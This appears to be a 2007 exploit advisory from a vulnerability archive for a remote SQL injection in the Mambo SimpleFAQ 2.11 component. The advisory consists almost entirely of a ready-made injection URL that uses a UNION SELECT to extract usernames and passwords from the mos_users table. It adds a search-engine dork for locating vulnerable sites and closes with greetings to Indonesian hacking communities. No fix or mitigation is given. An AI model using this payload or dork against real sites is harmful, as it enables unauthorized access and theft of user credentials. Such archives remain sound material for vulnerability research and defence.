Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17851
HistoryAug 21, 2007 - 12:00 a.m.

Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

2007-08-2100:00:00
vulners.com
33

########################################################################

Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

Vendor : http://www.parkviewconsultants.com/

Found By : k1tk4t - k1tk4t[4t]newhack.org

Location : Indonesia – #newhack[dot]org @irc.dal.net

Dork : inurl:"index.php?option=com_simplefaq"

########################################################################

exploit;
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*

########################################################################
Thanks;
str0ke
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer
dan semua temen2 komunitas security&hacking

-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX

all member newhack[dot]org

all member echo.or.id

all member www.yogyafree.net

all member www.sekuritionline.net

all member www.kecoak-elektronik.net

semua komunitas hacker&security Indonesia